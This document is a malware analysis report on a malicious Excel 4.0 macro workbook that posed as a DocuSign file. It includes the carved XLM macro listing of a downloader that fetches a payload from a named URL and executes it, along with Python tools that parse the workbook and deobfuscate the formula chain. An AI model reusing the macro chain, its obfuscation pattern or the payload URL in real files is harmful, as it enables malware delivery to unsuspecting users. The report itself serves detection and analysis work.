Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 00b38c5b4573bf08…

MALICIOUS

Office (OLE) / .XLS

Size: 331.0 KB   Created: 2006-09-16 00:00:00   Authoring application: Microsoft Excel
MD5: d4584f276e77f03d4039a6fc667fcfdb
SHA-1: b79d28ee7d552b522124e3cc97cf395bbbb63d98
SHA-256: 00b38c5b4573bf0810788d5cb3a4b740e80754fed3c633c0124f14a458a49545
Risk score: 302

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1059.001 PowerShell
  • T1566.001 Spearphishing Attachment
  • T1059 Command and Scripting Interpreter

The workbook carries Excel 4.0 (XLM) macro sheets and a built-in Auto_Open defined name (built-in code 1) that resolves through a ptgRef3d token to cell A40 of the macro sheet named '8', so the macro chain starts as soon as the file is opened with macros enabled. Control then moves between cells with RUN() (R59 to D50, D51 to M66, M67 to A50) rather than through a single entry formula, and every string the chain needs is assembled at run time: individual characters come from CHAR() over sums and differences of numeric cells (BN63 = CHAR(BO63+BP63+BQ63), E66 = CHAR(SUM(F66,G66,H66))), fragments are joined with CONCATENATE() and &, and the pieces are spread across the macro sheet '8' and the visible 'DocuSig' sheet. Note that in CALL(module, procedure, type_text, ...) the second argument is the exported function, not a second DLL: D50 and M66 call a module built as "Ke"&DocuSig!BW64&"32" (kernel32) with a procedure built as "Cr"&DocuSig!BY92&"yA" and type string "JCJ", passing DocuSig!BN62 and then DocuSig!BN62&DocuSig!BN77 as the string argument; the two literal fragments that are visible (BY95 = CHAR(101), 'e', and 8!K78 = CHAR(99), 'c') sit exactly where CreateDirectoryA would place them, so the two calls most plausibly create a nested directory for the payload. A50 calls a module built as "U"&DocuSig!BY82 with procedure "U"&8!E65 and type string "IICCII", passing the literal URL in 8!B98 ('https://shmncbd.com/ds/231120.gif') and the concatenated local path DocuSig!BN62&DocuSig!BN77&DocuSig!BN91, which is the argument pattern of URLDownloadToFileA. A51 then EXEC()s a command assembled from 8!W36 plus that same path, and A52 HALT()s. The sample is therefore a two-stage downloader that fetches the file at the referenced URL, writes it to disk and executes it; the ClamAV detection 'Doc.Downloader.Docusign0521-9864805-0' agrees with that classification.

Heuristics 7

  • ClamAV: Doc.Downloader.Docusign0521-9864805-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Docusign0521-9864805-0
  • Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
  • URL reconstructed from XLM cell array (1 URL) critical OLE_XLM_CELL_ARRAY_URL
    Excel 4.0 macro sheet stages its payload URL across the BIFF8 Shared String Table (one quoted-char SST entry concatenated with & at runtime), across individual numeric cells (one ASCII charcode per cell), or split across multi-char fragment cells a download formula concatenates by reference (=A1&A2&… / CONCATENATE(...)). The reconstructed URL is invisible to literal-bytes URL extraction because it is never contiguous in the workbook stream. URLs were recovered by walking the BIFF8 record stream and decoding SST entries, LABELSST/RK/NUMBER cells, and FORMULA cell-reference concatenation in token order.
  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://shmncbd.com/ds/231120.gif Referenced by macro
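How the two structural heuristics above (OLE_XLM_AUTOOPEN, an Excel 4.0 macro sheet is present; OLE_XLM_AUTOOPEN_DEFINEDNAME, a built-in Auto_Open name exists) can be reproduced by walking the BIFF8 record stream directly. This is an added example, not code from the report's analysis pipeline or from oletools. It parses BOUNDSHEET (0x0085) and Lbl (0x0018) records following the [MS-XLS] layouts and runs on a constructed Workbook stream built inline that mirrors the listing below (a DocuSig worksheet, a macro sheet named 8, and a built-in Auto_Open name whose rgce is a 7-byte ptgRef3d). The sample bytes are constructed; the heuristic IDs are reused from this report for readability.

```python
"""Walk a BIFF8 Workbook stream and flag Excel 4.0 macro sheets and auto-exec names.

Added example (not the report's own tooling). Record layouts follow [MS-XLS]
BoundSheet8 and Lbl. SAMPLE_STREAM at the bottom is constructed, not carved from the file.
"""
import struct

BOF, EOF, BOUNDSHEET, LBL = 0x0809, 0x000A, 0x0085, 0x0018
SHEET_TYPES = {0x00: "worksheet or dialog sheet", 0x01: "Excel 4.0 macro sheet",
               0x02: "chart", 0x06: "VBA module"}
HIDDEN_STATES = {0: "visible", 1: "hidden", 2: "very hidden"}
BUILTIN_NAMES = {0x01: "Auto_Open", 0x02: "Auto_Close", 0x0A: "Auto_Activate", 0x0B: "Auto_Deactivate"}
AUTO_EXEC = set(BUILTIN_NAMES.values())


def iter_records(stream):
    """Yield (type, payload) per record: 2-byte type, 2-byte length, payload."""
    off = 0
    while off + 4 <= len(stream):
        rtype, rlen = struct.unpack_from("<HH", stream, off)
        payload = stream[off + 4:off + 4 + rlen]
        if len(payload) < rlen:          # truncated record: stop instead of reading garbage
            break
        yield rtype, payload
        off += 4 + rlen


def parse_boundsheet(payload):
    """BoundSheet8: lbPlyPos(4) hsState(1) dt(1) cch(1) fHighByte(1) name."""
    ply_pos, state, dt, cch, high = struct.unpack_from("<IBBBB", payload, 0)
    raw = payload[8:]
    name = (raw[:cch * 2].decode("utf-16-le", "replace") if high & 1
            else raw[:cch].decode("latin-1", "replace"))
    return {"offset": ply_pos, "state": HIDDEN_STATES.get(state & 0x03, "?"),
            "type": SHEET_TYPES.get(dt, "0x%02x" % dt), "name": name}


def parse_lbl(payload):
    """Lbl: flags(2) chKey(1) cch(1) cce(2) reserved(2) itab(2) reserved(4) Name rgce.

    Name is fHighByte(1) followed by cch characters; when fBuiltin (flags bit 5)
    is set, the single character is the built-in name code (0x01 = Auto_Open).
    """
    flags, _chkey, cch, cce, _res, itab = struct.unpack_from("<HBBHHH", payload, 0)
    high, body = payload[14], payload[15:]
    if flags & 0x0020:
        name, builtin = BUILTIN_NAMES.get(body[0], "builtin_0x%02x" % body[0]), True
    else:
        width = 2 if high & 1 else 1
        name = body[:cch * width].decode("utf-16-le" if width == 2 else "latin-1", "replace")
        builtin = False
    return {"name": name, "builtin": builtin, "hidden": bool(flags & 1), "itab": itab, "cce": cce}


def scan_workbook_stream(stream):
    """Reproduce OLE_XLM_AUTOOPEN and OLE_XLM_AUTOOPEN_DEFINEDNAME from the raw records."""
    sheets, names = [], []
    for rtype, payload in iter_records(stream):
        if rtype == BOUNDSHEET:
            sheets.append(parse_boundsheet(payload))
        elif rtype == LBL:
            names.append(parse_lbl(payload))
    xlm = [s for s in sheets if s["type"] == "Excel 4.0 macro sheet"]
    auto = [n for n in names if n["builtin"] and n["name"] in AUTO_EXEC]
    findings = []
    if xlm:
        findings.append("OLE_XLM_AUTOOPEN: %d Excel 4.0 macro sheet(s): %s" % (
            len(xlm), ", ".join("%r (%s)" % (s["name"], s["state"]) for s in xlm)))
    if xlm and auto:
        findings.append("OLE_XLM_AUTOOPEN_DEFINEDNAME: %s" % ", ".join(
            "%s -> sheet %d, rgce %d bytes" % (n["name"], n["itab"], n["cce"]) for n in auto))
    return {"sheets": sheets, "names": names, "findings": findings}


# --- constructed sample stream (not bytes from the analysed file) -----------------
def _rec(rtype, payload):
    return struct.pack("<HH", rtype, len(payload)) + payload

def _boundsheet(name, dt, state=0):
    return _rec(BOUNDSHEET, struct.pack("<IBBBB", 0, state, dt, len(name), 0) + name.encode("latin-1"))

def _builtin_lbl(code, itab, rgce):
    header = struct.pack("<HBBHHH", 0x0020, 0, 1, len(rgce), 0, itab) + b"\0\0\0\0"
    return _rec(LBL, header + b"\0" + bytes([code]) + rgce)

PTG_REF3D_A40 = bytes([0x3A]) + struct.pack("<HHH", 0, 39, 0)   # ptgRef3d: ixti 0, row 40, col A
SAMPLE_STREAM = (_rec(BOF, bytes(16))
                 + _boundsheet("DocuSig", 0x00)
                 + _boundsheet("8", 0x01)                  # the Excel 4.0 macro sheet
                 + _boundsheet("8", 0x00)
                 + _builtin_lbl(0x01, 2, PTG_REF3D_A40)     # Auto_Open -> sheet 2 ('8')
                 + _rec(EOF, b""))

if __name__ == "__main__":
    for line in scan_workbook_stream(SAMPLE_STREAM)["findings"]:
        print(line)
```

On a real .xls the bytes to feed in are the OLE stream named "Workbook" (BIFF8; older BIFF5 files use "Book"), for example `olefile.OleFileIO(path).openstream("Workbook").read()`. The walker deliberately stays minimal: it does not stitch CONTINUE records or decode the rgce, and a "very hidden" state on a macro sheet, which this sample does not use but which is common in the same family, is surfaced in the finding text rather than treated as a separate heuristic.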

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: xlm_macros.txt
SHA-256: 235e5c8d20c84fa7e893c28de1bcc715b3fa59f4feb5de8e7a84ebbe334d22cc
Kind: xlm-macro
Source: oletools.olevba.extract_all_macros (XLM macro listing)
Size: 6059 bytes

Preview (first 1,000 lines of the extracted script):
' 0085     16 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  DocuSig
' 0085     18 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -    8 
' 0085     18 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -    8 
' 0085     18 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -    8 
' 0085     18 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -    8 
' 0085     18 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -    8 
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d    8 !A40 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
'    8 ,A51,RUN(R59),""
'    8 ,R59,RUN(   8 !D50),""
'    8 ,M66,"CALL("Ke"& DocuSig!BW64&"32","Cr"& DocuSig!BY92&"yA","JCJ", DocuSig!BN62& DocuSig!BN77,0)",""
'    8 ,M67,RUN(   8 !A50),""
'    8 ,B98,"https://shmncbd.com/ds/231120.gif",""
'    8 ,BN62,"CONCATENATE(BN63,BN64,BN65,BN66,BN67,BN68,BN69,BN70,BN71)",""
'    8 ,BN63,CHAR(BO63+BP63+BQ63),""
'    8 ,BN64,CHAR(BO64+BP64+BQ64),""
'    8 ,BW64,CONCATENATE(BW67&BW68&BW69&BW70),""
'    8 ,BN65,CHAR(BO65+BP65+BQ65),""
'    8 ,BW65,CHAR(BX65+BY65+BZ65),""
'    8 ,BN66,CHAR(BO66+BP66-BQ66),""
'    8 ,BW66,CHAR(BX66+BY66+BZ66),""
'    8 ,BN67,CHAR(BO67+BP67-BQ67),""
'    8 ,BW67,CHAR(BX67+BY67+BZ67),""
'    8 ,BN68,CHAR(BO68+BP68-BQ68),""
'    8 ,BW68,CHAR(BX68+BY68+BZ68),""
'    8 ,BN69,CHAR(BO69-BP69+BQ69),""
'    8 ,BW69,CHAR(BX69-BY69-BZ69),""
'    8 ,BN70,CHAR(BO70-BP70+BQ70),""
'    8 ,BW70,CHAR(BX70-BY70-BZ70),""
'    8 ,BN71,CHAR(BO71-BP71+BQ71),""
'    8 ,BW71,CHAR(BX71-BY71+BZ71),""
'    8 ,BW72,CHAR(BX72-BY72+BZ72),""
'    8 ,BN77,"CONCATENATE(BN78,BN79,BN80,BN81,BN82,BN83,BN84)",""
'    8 ,BN78,CHAR(BO78-BP78-BQ78),""
'    8 ,BN79,CHAR(BO79-BP79-BQ79),""
'    8 ,BN80,CHAR(BO80-BP80-BQ80),""
'    8 ,BN81,CHAR(BO81-BP81+BQ81),""
'    8 ,BN82,CHAR(BO82-BP82+BQ82),""
'    8 ,BY82,"CONCATENATE(BY84,BY85,BY86,BY87,BY88)",""
'    8 ,BN83,CHAR(BO83-BP83+BQ83),""
'    8 ,BY83,CHAR(BZ83+CA83+CB83),""
'    8 ,BN84,CHAR(BO84-BP84+BQ84),""
'    8 ,BY84,CHAR(BZ84+CA84+CB84),""
'    8 ,BY85,CHAR(BZ85+CA85+CB85),""
'    8 ,BY86,CHAR(BZ86-CA86-CB86),""
'    8 ,BY87,CHAR(BZ87-CA87-CB87),""
'    8 ,BY88,CHAR(BZ88-CA88-CB88),""
'    8 ,BN91,"CONCATENATE(BN92,BN93,BN94,BN95,BN96,BN97,BN98,BN99,BN100,BN101,BN102,BN103,BN104)",""
'    8 ,BN92,[],""
'    8 ,BY92,"CONCATENATE(BY95,BY96,BY97,BY98&"D"&   8 !K75,   8 !K76,   8 !K77,   8 !K78,   8 !K79,   8 !K80,   8 !K81)",""
'    8 ,BN93,[],""
'    8 ,BY93,CHAR(BZ93+CA93+CB93),""
'    8 ,BN94,[],""
'    8 ,BS94,CONCATENATE(BS95&BS96&BS97&BS98),""
'    8 ,BY94,CHAR(BZ94+CA94+CB94),""
'    8 ,BN95,[],""
'    8 ,BS95,CHAR(BT95+BU95-BV95),""
'    8 ,BY95,CHAR(101),""
'    8 ,BN96,[],""
'    8 ,BS96,CHAR(BT96+BU96-BV96),""
'    8 ,BY96,CHAR(BZ96+CA96+CB96),""
'    8 ,BN97,[],""
'    8 ,BS97,CHAR(BT97-BU97+BV97),""
'    8 ,BY97,CHAR(BZ97-CA97-CB97),""
'    8 ,BN98,[],""
'    8 ,BS98,CHAR(BT98-BU98+BV98),""
'    8 ,BY98,CHAR(BZ98-CA98-CB98),""
'    8 ,BN99,[],""
'    8 ,BY99,CHAR(BZ99-CA99-CB99),""
'    8 ,BN100,[],""
'    8 ,BN101,[],""
'    8 ,BN102,[],""
'    8 ,BN103,[],""
'    8 ,BN104,[],""
'    8 ,BR126,CONCATENATE(BR127&BR128&BR129&BR130&BR131&BR132&BR133),""
'    8 ,BR127,CHAR(BS127+BT127+BU127),""
'    8 ,BR128,CHAR(BS128+BT128+BU128),""
'    8 ,BR129,CHAR(BS129+BT129+BU129),""
'    8 ,BR130,CHAR(BS130+BT130+BU130),""
'    8 ,BR131,CHAR(BS131-BT131-BU131),""
'    8 ,BR132,CHAR(BS132-BT132-BU132),""
'    8 ,BR133,CHAR(BS133-BT133-BU133),""
'    8 ,W36,"CONCATENATE(W37,W38,W39,W40,W41,W42,W43,W44,W45,W46,W47,W48)",""
'    8 ,W37,[],""
'    8 ,W38,[],""
'    8 ,W39,[],""
'    8 ,W40,[],""
'    8 ,W41,[],""
'    8 ,W42,[],""
'    8 ,W43,[],""
'    8 ,W44,[],""
'    8 ,W45,[],""
'    8 ,W46,[],""
'    8 ,W47,[],""
'    8 ,W48,[],""
'    8 ,N62,"CONCATENATE("S"&N64,N65,N66,N67,N68&S76)",""
'    8 ,N63,CHAR(O63+P63+Q63),""
'    8 ,N64,CHAR(O64+P64+Q64),""
'    8 ,N65,CHAR(O65+P65+Q65),""
'    8 ,N66,CHAR(O66-P66-Q66),""
'    8 ,N67,CHAR(O67-P67-Q67),""
'    8 ,N68,CHAR(O68-P68-Q68),""
'    8 ,K75,CHAR(L75-M75-N75),""
'    8 ,K76,CHAR(L76+M76-N76),""
'    8 ,S76,"CONCATENATE(S77,S78,S79,S80,S81,S82&"A")",""
'    8 ,K77,CHAR(L77+M77-N77),""
'    8 ,S77,CHAR(T77-U77-V77),""
'    8 ,K78,CHAR(99),""
'    8 ,S78,CHAR(T78-U78+V78),""
'    8 ,K79,CHAR(L79+M79-N79),""
'    8 ,S79,CHAR(T79-U79+V79),""
'    8 ,K80,CHAR(L80-M80+N80),""
'    8 ,S80,CHAR(T80-U80+V80),""
'    8 ,K81,CHAR(L81-M81+N81),""
'    8 ,S81,CHAR(T81+U81-V81),""
'    8 ,S82,CHAR(T82+U82-V82),""
'    8 ,S83,CHAR(T83+U83-V83),""
'    8 ,D50,"CALL("Ke"& DocuSig!BW64&"32","Cr"& DocuSig!BY92&"yA","JCJ", DocuSig!BN62,0)",""
'    8 ,D51,RUN(   8 !M66),""
'    8 ,E65,"CONCATENATE(E67,E68,E69,E70,E71,E72,E73,E74,E75,E76,E77,E78,E79,E80,E81,E82,E83)",""
'    8 ,E66,"CHAR(SUM(F66,G66,H66))",""
'    8 ,E67,"CHAR(SUM(F67,G67,H67))",""
'    8 ,E68,"CHAR(SUM(F68,G68,H68))",""
'    8 ,E69,CHAR(F69-G69-H69),""
'    8 ,E70,CHAR(F70-G70-H70),""
'    8 ,E71,CHAR(F71-G71-H71),""
'    8 ,E72,CHAR(F72+G72-H72),""
'    8 ,E73,CHAR(F73+G73-H73),""
'    8 ,E74,CHAR(F74+G74-H74),""
'    8 ,E75,CHAR(F75-G75+H75),""
'    8 ,E76,CHAR(F76-G76+H76),""
'    8 ,E77,CHAR(F77-G77+H77),""
'    8 ,E78,"CHAR(SUM(F78,G78,H78))",""
'    8 ,E79,"CHAR(SUM(F79,G79,H79))",""
'    8 ,E80,"CHAR(SUM(F80,G80,H80))",""
'    8 ,E81,CHAR(F81-G81-H81),""
'    8 ,E82,CHAR(F82-G82-H82),""
'    8 ,E83,CHAR(F83-G83-H83),""
'    8 ,A50,"CALL("U"& DocuSig!BY82,"U"&   8 !E65,"IICCII",0,   8 !B98, DocuSig!BN62& DocuSig!BN77& DocuSig!BN91,0,0)",""
'    8 ,A51,EXEC(   8 !W36& DocuSig!BN62& DocuSig!BN77& DocuSig!BN91),""
'    8 ,A52,HALT(),""
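A resolver for the formula pattern in the listing above: CHAR() over sums and differences of numeric cells, CONCATENATE() and &, cross-sheet references (including the padded "   8 !K75" form olevba prints for the sheet named 8), and the RUN() chain between cells. This is an added example, not code from the report's pipeline or from oletools. The numeric operand cells (BO63, BP63, BQ63 and the rest) are not shown on the page, so build_sample() constructs them, and the path fragments and command prefix ("C:\Docs", "\Sign", "\client.exe", "cmd.exe /c ") are invented; the formula shapes, cell addresses, literal fragments (BY95 = CHAR(101), 8!K78 = CHAR(99)), type strings and the URL are taken from the listing, and the chain is shortened to R59, D50, D51, A50, A51, A52.

```python
import re

REF = r"(?:[A-Za-z0-9_]+\s*!\s*)?\$?[A-Z]{1,3}\$?\d+"           # A1, DocuSig!BW64, "   8 !K75"
TOKEN_RE = re.compile(r'\s+|"(?:[^"]|"")*"|' + REF + r'|\d+(?:\.\d+)?|[A-Z_][A-Z0-9_.]*|[&+\-,()]')
REF_RE, RUN_RE = re.compile(REF), re.compile(r"=RUN\(\s*(.+?)\s*\)$")

def as_str(v): return "" if v is None else str(int(v) if isinstance(v, float) and v.is_integer() else v)
def as_num(v): return float(v) if isinstance(v, str) else (v or 0)

class Parser:
    """expr := sum ('&' sum)* ; sum := atom (('+'|'-') atom)* ; atom := literal | ref | NAME(args)"""
    def __init__(self, ev, sheet, text):
        self.ev, self.sheet, self.i = ev, sheet, 0
        self.toks = [t for t in TOKEN_RE.findall(text) if not t.isspace()]
    def peek(self): return self.toks[self.i] if self.i < len(self.toks) else None
    def take(self): self.i += 1; return self.toks[self.i - 1]
    def expr(self):
        v = self.sum_()
        while self.peek() == "&": self.take(); v = as_str(v) + as_str(self.sum_())
        return v
    def sum_(self):
        v = self.atom()
        while self.peek() in ("+", "-"):
            op = self.take(); r = as_num(self.atom())
            v = as_num(v) + r if op == "+" else as_num(v) - r
        return v
    def atom(self):
        t = self.take()
        if t == "-": return -as_num(self.atom())
        if t == "(": v = self.expr(); self.take(); return v
        if t[0] == '"': return t[1:-1].replace('""', '"')
        if REF_RE.fullmatch(t): return self.ev.resolve(t, self.sheet)   # tested before number: "8!K75"
        if t[0].isdigit(): return float(t) if "." in t else int(t)
        self.take(); args = []                                          # NAME( arg, arg, ... )
        while self.peek() not in (")", None):
            args.append(self.expr())
            if self.peek() == ",": self.take()
        self.take()
        return self.ev.call(t, args)

class Evaluator:
    def __init__(self, cells): self.cells, self.memo, self.calls = cells, {}, []
    def resolve(self, ref, sheet):
        if "!" in ref: sheet, _, ref = ref.partition("!")
        key = "%s!%s" % (sheet.strip(), ref.strip().replace("$", ""))
        if key not in self.memo:
            src = self.cells.get(key, ""); self.memo[key] = ""           # "" also guards reference cycles
            formula = isinstance(src, str) and src.startswith("=")
            self.memo[key] = Parser(self, key.split("!")[0], src[1:]).expr() if formula else src
        return self.memo[key]
    def call(self, name, args):
        if name == "CHAR": return chr(int(as_num(args[0])))
        if name == "CONCATENATE": return "".join(map(as_str, args))
        if name == "SUM": return sum(map(as_num, args))
        rendered = "%s(%s)" % (name, ", ".join(map(as_str, args)))
        if name in ("CALL", "EXEC"): self.calls.append(rendered)      # what the macro would invoke
        return rendered

def trace(ev, start, limit=100):
    """Evaluate cells downward from START, jump on RUN(target), stop at HALT() or an empty cell."""
    sheet, cell = start.split("!"); visited = []
    for _ in range(limit):
        key = "%s!%s" % (sheet, cell); src = ev.cells.get(key)
        if src is None: break                                           # ran off the macro sheet
        visited.append(key)
        if src == "=HALT()": break
        m = RUN_RE.match(src) if isinstance(src, str) else None
        if m:                                                           # RUN(): jump, no return
            target = m.group(1) if "!" in m.group(1) else sheet + "!" + m.group(1)
            sheet, cell = (s.strip() for s in target.split("!")); continue
        ev.resolve(key, sheet)
        cell = re.sub(r"\d+$", lambda n: str(int(n.group()) + 1), cell)   # fall through to next row
    return visited

def char_cells(cells, sheet, col, ops, row, text):
    """One char per row as in the listing: col{r} = CHAR(op0{r}+op1{r}-op2{r}) over constructed ints."""
    refs = []
    for i, ch in enumerate(text):
        r, a, b = row + i, 40 + i, 100 + 3 * i
        cells["%s!%s%d" % (sheet, col, r)] = "=CHAR(%s%d+%s%d-%s%d)" % (ops[0], r, ops[1], r, ops[2], r)
        for opcol, v in zip(ops, (a, b, a + b - ord(ch))): cells["%s!%s%d" % (sheet, opcol, r)] = v
        refs.append("%s%d" % (col, r))
    return refs

def build_sample():
    c, D, S = {}, "DocuSig", "   8 !"   # shaped like the listing; paths and command are invented, '8' padded as olevba prints it
    c[D + "!BW64"] = "=CONCATENATE(" + "&".join(char_cells(c, D, "BW", ("BX", "BY", "BZ"), 67, "rnel")) + ")"
    k = char_cells(c, "8", "K", ("L", "M", "N"), 75, "irector"); c["8!K78"] = "=CHAR(99)"
    c[D + "!BY95"] = "=CHAR(101)"
    c[D + "!BY92"] = ("=CONCATENATE(BY95," + ",".join(char_cells(c, D, "BY", ("BZ", "CA", "CB"), 96, "ate"))
                      + '&"D"&' + ",".join(S + r for r in k) + ")")
    c[D + "!BY82"] = "=CONCATENATE(" + ",".join(char_cells(c, D, "BY", ("BZ", "CA", "CB"), 84, "rlmon")) + ")"
    c["8!E65"] = "=CONCATENATE(" + ",".join(char_cells(c, "8", "E", ("F", "G", "H"), 67, "RLDownloadToFileA")) + ")"
    for cell, row, text in (("BN62", 63, "C:\\Docs"), ("BN77", 78, "\\Sign"), ("BN91", 92, "\\client.exe")):
        c[D + "!" + cell] = "=CONCATENATE(" + ",".join(char_cells(c, D, "BN", ("BO", "BP", "BQ"), row, text)) + ")"
    c["8!W36"], c["8!B98"] = "cmd.exe /c ", "https://shmncbd.com/ds/231120.gif"
    c["8!R59"] = "=RUN(" + S + "D50)"
    c["8!D50"] = '=CALL("Ke"&DocuSig!BW64&"32","Cr"&DocuSig!BY92&"yA","JCJ",DocuSig!BN62,0)'
    c["8!D51"] = "=RUN(" + S + "A50)"
    c["8!A50"] = ('=CALL("U"&DocuSig!BY82,"U"&' + S + 'E65,"IICCII",0,' + S
                  + "B98,DocuSig!BN62&DocuSig!BN77&DocuSig!BN91,0,0)")
    c["8!A51"] = "=EXEC(" + S + "W36&DocuSig!BN62&DocuSig!BN77&DocuSig!BN91)"
    c["8!A52"] = "=HALT()"
    return c

if __name__ == "__main__":
    ev = Evaluator(build_sample()); print(" -> ".join(trace(ev, "8!R59"))); print("\n".join(ev.calls))
```

Running it prints the cell path R59, D50, D51, A50, A51, A52 and three resolved invocations: CreateDirectoryA on the invented path, the download call with the page's URL and the full local path, and the EXEC of that path. The point of the evaluator is the resolve/memo structure: every cell is computed once, a sheet-qualified reference switches the default sheet for the sub-expression, and CALL/EXEC are never executed, only rendered with their resolved arguments, which is the safe way to read what a sample of this shape would do without running it.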